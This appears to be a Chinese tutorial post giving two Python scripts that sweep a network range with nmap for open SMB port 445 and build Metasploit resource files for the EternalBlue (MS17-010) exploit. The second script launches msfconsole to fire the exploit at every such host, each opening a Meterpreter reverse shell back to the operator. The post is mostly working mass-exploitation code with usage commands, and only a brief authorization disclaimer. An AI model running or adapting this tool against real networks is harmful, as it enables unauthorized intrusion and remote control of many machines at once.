摘要:用 python3 调用 nmap 批量探测 445 端口,并生成 msf 资源文件批量利用永恒之蓝(MS17-010)。注意脚本只判断 445 端口是否开放,并不验证目标是否真的存在 MS17-010 漏洞。

扫描脚本版本

# -*- coding:utf8 -*-
import itertools
import optparse
import os
from threading import Thread

import nmap
from IPy import IP

# 根据参数拆分target
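def _slice_bounds(num, countofip, count):
    """Return the ``[start, end)`` index range that worker ``num`` of ``count`` owns.

    Addresses are dealt out in equal contiguous chunks of ``countofip // count``;
    whatever does not divide evenly is given to the last worker so every
    address is scanned exactly once.  (The original truncated the division
    and silently never scanned the last ``countofip % count`` hosts.)
    """
    chunk = countofip // count
    start = chunk * (num - 1)
    end = countofip if num == count else chunk * num
    return start, min(end, countofip)


def find_target(target, num, countofip, count, *, scanner_factory=None, report=None):
    """Scan this worker's share of ``target`` for TCP/445 and record the hits.

    The address range is split into ``count`` contiguous slices and worker
    ``num`` (1-based) takes the ``num``-th one.  Each host gets one nmap scan
    of port 445; a host that reports the port ``open`` is passed to ``report``
    (default: ``saveip``), which appends it to this worker's resource file.

    Args:
        target: sliceable address collection (an ``IPy.IP`` network in the
            callers here); each element is converted with ``str()``.
        num: 1-based worker index, ``1 <= num <= count``.
        countofip: number of addresses in ``target``.
        count: total number of workers the range is split across.
        scanner_factory: zero-argument callable returning an object with a
            ``scan(host, ports)`` method compatible with python-nmap's
            ``PortScanner`` (the default).  Exposed so the routine can be
            exercised without nmap installed.
        report: ``report(num, host)`` called for every host with 445 open
            (default ``saveip``).

    Raises:
        ValueError: if ``count < 1`` or ``num`` is outside ``1..count``.

    Note: an open 445 port only means the host speaks SMB.  This is NOT a
    vulnerability check — patched and non-Windows hosts are recorded too.
    """
    if count < 1 or not 1 <= num <= count:
        raise ValueError("num must be in 1..count and count must be >= 1")
    start, end = _slice_bounds(num, countofip, count)
    make_scanner = scanner_factory or nmap.PortScanner
    record = saveip if report is None else report
    prefix = "thread" + str(num) + ":"
    for host in target[start:end]:
        host = str(host)
        rst = make_scanner().scan(host, '445')
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print(prefix + 'Host not up:' + host)
            continue
        # A host that is up may still have no 'tcp' entry (e.g. probe
        # filtered); treat anything other than an explicit 'open' as closed
        # instead of raising KeyError and killing the worker thread.
        state = rst['scan'].get(host, {}).get('tcp', {}).get(445, {}).get('state')
        if state == 'open':
            print(prefix + host + ' with 445 port open, there may be a vulnerability in ms17_010')
            record(num, host)
        else:
            print(prefix + host + ' 445 port not open!')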


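# Process-wide LPORT allocator shared by all scanner threads.  ``next()`` on an
# ``itertools.count`` runs entirely in C, so in CPython two threads cannot be
# handed the same value (the threading module names its threads the same way).
_LPORT_SEQ = itertools.count(4444)


def create_file(configfile, host, listen_host=None):
    """Append a Metasploit resource-file stanza that attacks ``host``.

    Writes a ``use`` / ``set`` / ``exploit -j -z`` sequence for
    ``exploit/windows/smb/ms17_010_eternalblue`` with the (hard-coded, x64-only)
    ``windows/x64/meterpreter/reverse_tcp`` payload.  Every stanza gets its
    own LPORT so each background job listens on a distinct port.

    Args:
        configfile: open, writable text file (the per-thread ``meta<N>.rc``).
        host: target IPv4 address as a string.
        listen_host: LHOST to write into the stanza; ``None`` means use the
            module-level ``lhost`` that ``main()`` sets.  It must be an
            address the target can reach, or the reverse shell never arrives.

    Raises:
        ValueError: if the port counter runs past 65535.

    LPORT comes from a process-wide counter rather than the old
    ``4444 + octet3 + octet4`` formula: that formula mapped e.g. 10.0.1.2 and
    10.0.2.1 to the same port, so the second job would try to listen on a
    port already taken by the first.
    """
    lport = next(_LPORT_SEQ)
    if lport > 65535:
        raise ValueError("ran out of listener ports (more than 61091 targets in one run)")
    lhost_value = lhost if listen_host is None else listen_host
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost_value) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost_value) + ":" + str(lport))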


# 保存ip
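def saveip(num, host):
    """Append an attack stanza for ``host`` to worker ``num``'s ``meta<num>.rc``.

    Each worker writes only to its own file, so no locking is needed between
    threads.  The file is opened in append mode: stanzas from earlier runs
    are kept, so a rerun adds to them rather than replacing them.  Using a
    ``with`` block guarantees the handle is closed even if ``create_file``
    raises.
    """
    with open('meta' + str(num) + '.rc', 'a') as configfile:
        create_file(configfile, host)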


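def main():
    """Parse the command line and fan the 445 scan out over ``count`` threads.

    Options (all required):
        -H  target network in any CIDR / range form ``IPy.IP`` accepts.
        -L  LHOST written into every generated stanza (must be reachable
            from the targets).
        -C  number of scanner threads; the range is split into that many
            contiguous slices.

    Each thread appends to its own ``meta<N>.rc``.  This version neither
    waits for the threads nor launches msfconsole.
    """
    global lhost
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, _args) = parser.parse_args()
    host = options.host
    # Validate before building IP(host): the original constructed the network
    # first and crashed on a missing -H instead of printing the usage text,
    # and a missing -L ended up as the literal string "None" in the .rc file.
    if host is None or options.lhost is None or options.count is None:
        parser.print_help()
        raise SystemExit(0)
    if options.count < 1:
        parser.error('-C must be a positive number of threads')
    lhost = options.lhost
    count = options.count
    target = IP(host)
    countofip = target.len()
    workers = []
    for idx in range(1, count + 1):
        worker = Thread(target=find_target, args=(target, idx, countofip, count))
        worker.start()
        workers.append(worker)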


if __name__ == "__main__":
    # Entry point only when run as a script; importing the module is side-effect free.
    raise SystemExit(main())


使用说明:


需要先安装 nmap 本体(python-nmap 只是对 nmap 可执行文件的封装,没有 nmap 二进制会报错),再安装 python 包:pip3 install python-nmap IPy


root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3 为线程数,3 为同时使用三个线程
// -L 为回连地址(LHOST),会写入每条 set lhost;它必须是目标主机能够访问到的本机地址。示例中的 127.0.1.1 是环回地址,远程目标无法回连到它,实际使用时应改为本机在目标网段可达的 IP

扫描结果保存在形如 meta1.rc、meta2.rc 的文件中,最多与线程数相同(只有扫到 445 开放主机的线程才会创建自己的文件)。文件中记录的是 445 端口开放的主机,并未验证是否存在 MS17-010 漏洞。文件以追加方式写入,重复运行前请先删除旧的 meta*.rc,否则上次的结果会被累加。

扫描脚本&&获取shell版本

# -*- coding:utf8 -*-
import itertools
import optparse
import os
from threading import Thread

import nmap
from IPy import IP


# 根据参数拆分target
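def _slice_bounds(num, countofip, count):
    """Return the ``[start, end)`` index range that worker ``num`` of ``count`` owns.

    Addresses are dealt out in equal contiguous chunks of ``countofip // count``;
    whatever does not divide evenly is given to the last worker so every
    address is scanned exactly once.  (The original truncated the division
    and silently never scanned the last ``countofip % count`` hosts.)
    """
    chunk = countofip // count
    start = chunk * (num - 1)
    end = countofip if num == count else chunk * num
    return start, min(end, countofip)


def find_target(target, num, countofip, count, *, scanner_factory=None, report=None):
    """Scan this worker's share of ``target`` for TCP/445 and record the hits.

    The address range is split into ``count`` contiguous slices and worker
    ``num`` (1-based) takes the ``num``-th one.  Each host gets one nmap scan
    of port 445; a host that reports the port ``open`` is passed to ``report``
    (default: ``saveip``), which appends it to this worker's resource file.

    Args:
        target: sliceable address collection (an ``IPy.IP`` network in the
            callers here); each element is converted with ``str()``.
        num: 1-based worker index, ``1 <= num <= count``.
        countofip: number of addresses in ``target``.
        count: total number of workers the range is split across.
        scanner_factory: zero-argument callable returning an object with a
            ``scan(host, ports)`` method compatible with python-nmap's
            ``PortScanner`` (the default).  Exposed so the routine can be
            exercised without nmap installed.
        report: ``report(num, host)`` called for every host with 445 open
            (default ``saveip``).

    Raises:
        ValueError: if ``count < 1`` or ``num`` is outside ``1..count``.

    Note: an open 445 port only means the host speaks SMB.  This is NOT a
    vulnerability check — patched and non-Windows hosts are recorded too,
    and the merged resource file will fire the exploit at all of them.
    """
    if count < 1 or not 1 <= num <= count:
        raise ValueError("num must be in 1..count and count must be >= 1")
    start, end = _slice_bounds(num, countofip, count)
    make_scanner = scanner_factory or nmap.PortScanner
    record = saveip if report is None else report
    prefix = "thread" + str(num) + ":"
    for host in target[start:end]:
        host = str(host)
        rst = make_scanner().scan(host, '445')
        if rst['nmap']['scanstats']['uphosts'] == '0':
            print(prefix + 'Host not up:' + host)
            continue
        # A host that is up may still have no 'tcp' entry (e.g. probe
        # filtered); treat anything other than an explicit 'open' as closed
        # instead of raising KeyError and killing the worker thread.
        state = rst['scan'].get(host, {}).get('tcp', {}).get(445, {}).get('state')
        if state == 'open':
            print(prefix + host + ' with 445 port open, there may be a vulnerability in ms17_010')
            record(num, host)
        else:
            print(prefix + host + ' 445 port not open!')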


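# Process-wide LPORT allocator shared by all scanner threads.  ``next()`` on an
# ``itertools.count`` runs entirely in C, so in CPython two threads cannot be
# handed the same value (the threading module names its threads the same way).
_LPORT_SEQ = itertools.count(4444)


def create_file(configfile, host, listen_host=None):
    """Append a Metasploit resource-file stanza that attacks ``host``.

    Writes a ``use`` / ``set`` / ``exploit -j -z`` sequence for
    ``exploit/windows/smb/ms17_010_eternalblue`` with the (hard-coded, x64-only)
    ``windows/x64/meterpreter/reverse_tcp`` payload.  Every stanza gets its
    own LPORT so each background job listens on a distinct port.

    Args:
        configfile: open, writable text file (the per-thread ``meta<N>.rc``).
        host: target IPv4 address as a string.
        listen_host: LHOST to write into the stanza; ``None`` means use the
            module-level ``lhost`` that ``main()`` sets.  It must be an
            address the target can reach, or the reverse shell never arrives.

    Raises:
        ValueError: if the port counter runs past 65535.

    LPORT comes from a process-wide counter rather than the old
    ``4444 + octet3 + octet4`` formula: that formula mapped e.g. 10.0.1.2 and
    10.0.2.1 to the same port, so the second job would try to listen on a
    port already taken by the first.
    """
    lport = next(_LPORT_SEQ)
    if lport > 65535:
        raise ValueError("ran out of listener ports (more than 61091 targets in one run)")
    lhost_value = lhost if listen_host is None else listen_host
    configfile.write('use exploit/windows/smb/ms17_010_eternalblue\n')
    configfile.write('set rhost ' + host + '\n')
    configfile.write('set payload windows/x64/meterpreter/reverse_tcp\n')
    configfile.write('set lport ' + str(lport) + '\n')
    configfile.write('set lhost ' + str(lhost_value) + '\n')
    configfile.write('exploit -j -z\n')
    print("Your shell will created at " + str(lhost_value) + ":" + str(lport))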


# 保存ip
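def saveip(num, host):
    """Append an attack stanza for ``host`` to worker ``num``'s ``meta<num>.rc``.

    Each worker writes only to its own file, so no locking is needed between
    threads.  The file is opened in append mode: stanzas from earlier runs
    are kept, so a rerun adds to them rather than replacing them.  Using a
    ``with`` block guarantees the handle is closed even if ``create_file``
    raises.
    """
    with open('meta' + str(num) + '.rc', 'a') as configfile:
        create_file(configfile, host)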


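def merge(count):
    """Append ``meta2.rc`` .. ``meta<count>.rc`` onto the end of ``meta1.rc``.

    ``meta1.rc`` is created if it does not exist, so the caller can always
    hand it to ``msfconsole -r``.  A worker that found nothing never created
    its file; such files are skipped instead of being touched into existence.
    The merged file is closed before returning — the original left it open,
    so buffered stanzas could still be unflushed when msfconsole read it.

    Args:
        count: number of worker files; ``count < 2`` means nothing to merge.
    """
    with open("meta1.rc", 'a') as merged:
        for idx in range(2, count + 1):
            try:
                part = open("meta" + str(idx) + ".rc", 'r')
            except FileNotFoundError:
                continue
            with part:
                merged.writelines(part)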

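def main():
    """Scan with ``count`` threads, merge the resource files, then run msfconsole.

    Options (all required):
        -H  target network in any CIDR / range form ``IPy.IP`` accepts.
        -L  LHOST written into every generated stanza (must be reachable
            from the targets).
        -C  number of scanner threads; the range is split into that many
            contiguous slices.

    After all threads finish, ``merge`` folds every ``meta<N>.rc`` into
    ``meta1.rc`` and ``msfconsole -r meta1.rc`` is started.  That launches
    ``ms17_010_eternalblue`` against every host with 445 open — no
    vulnerability check has been done — so only run this against systems you
    are authorised to attack.
    """
    global lhost
    import subprocess
    parser = optparse.OptionParser('%prog -H <target> -L <lhost> -C <count>')
    parser.add_option('-H', dest='host', type='string')
    parser.add_option('-L', dest='lhost', type='string')
    parser.add_option('-C', dest='count', type='int')
    (options, _args) = parser.parse_args()
    host = options.host
    # Validate before building IP(host): the original constructed the network
    # first and crashed on a missing -H instead of printing the usage text,
    # and a missing -L ended up as the literal string "None" in the .rc file.
    if host is None or options.lhost is None or options.count is None:
        parser.print_help()
        raise SystemExit(0)
    if options.count < 1:
        parser.error('-C must be a positive number of threads')
    lhost = options.lhost
    count = options.count
    target = IP(host)
    countofip = target.len()
    workers = []
    for idx in range(1, count + 1):
        worker = Thread(target=find_target, args=(target, idx, countofip, count))
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()

    merge(count)
    # Argument list rather than a shell string: nothing here is re-parsed by
    # a shell.  msfconsole keeps the terminal, so stdin/stdout are inherited.
    subprocess.run(['msfconsole', '-r', 'meta1.rc'], check=False)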

if __name__ == "__main__":
    # Entry point only when run as a script; importing the module is side-effect free.
    raise SystemExit(main())

使用说明:


需要先安装 nmap 本体(python-nmap 只是对 nmap 可执行文件的封装),再安装 python 包:pip3 install python-nmap IPy,以及安装 msf

安装 msf 命令(注意:下面这条命令以 root 身份直接执行从 GitHub 下载的安装脚本,没有任何完整性或签名校验。建议先把脚本下载下来审阅内容,或改用发行版 / 官方签名的安装包,而不是直接运行):
root@ubuntufree:~#curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

root@ubuntufree:~#python3 shaoip.py -H 192.168.0.0/16 -L 127.0.1.1 -C 3
// shaoip.py 为脚本的路径
// -H 192.168.0.0/16 为对192.168.0.0/16网段进行扫描
// -C 3 为线程数,3 为同时使用三个线程
// -L 为回连地址(LHOST),会写入每条 set lhost;它必须是目标主机能够访问到的本机地址。示例中的 127.0.1.1 是环回地址,远程目标无法回连到它,实际使用时应改为本机在目标网段可达的 IP

扫描结果合并保存在 meta1.rc 中,随后脚本会自动执行 msfconsole -r meta1.rc,对文件中的每台主机依次发起 ms17_010_eternalblue 攻击。注意:脚本只检查 445 端口是否开放,并未验证目标是否真的存在 MS17-010 漏洞,已打补丁或非 Windows 的主机也会被写入并被尝试攻击;建议先用专门的 MS17-010 检测(例如 nmap 的 smb-vuln-ms17-010 脚本)筛选。payload 固定为 windows/x64,32 位目标不会返回 session。meta*.rc 以追加方式写入,重复运行前请先删除旧文件,否则上次的目标会被再次攻击。仅可对已获得书面授权的目标使用。可以在 msf 中使用 sessions 查看已经获得的 shell。

